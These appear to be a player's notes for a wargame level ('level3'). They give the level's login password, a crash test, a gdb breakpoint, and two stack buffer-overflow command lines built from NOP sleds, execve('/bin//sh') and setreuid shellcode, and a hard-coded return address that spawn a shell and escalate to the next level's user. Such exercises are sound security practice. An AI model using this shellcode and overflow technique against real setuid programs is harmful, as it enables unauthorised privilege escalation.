connect with password PIZIPMWKEC

/levels/level3/level3 `python -c 'print "A"*524'` segfaults

setuid shellcode
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80

b *0x080484c3 in order to find src and dst addresses for the strcpy

this gives a shell 
/levels/level3/level3 `python -c 'print "\x90"*499+"\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80\x61"+"\x67\xda\xff\xbf"'` 

this makes us level4 users
/levels/level3/level3 `python -c 'print "\x90"*490+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x67\xda\xff\xbf"'` 

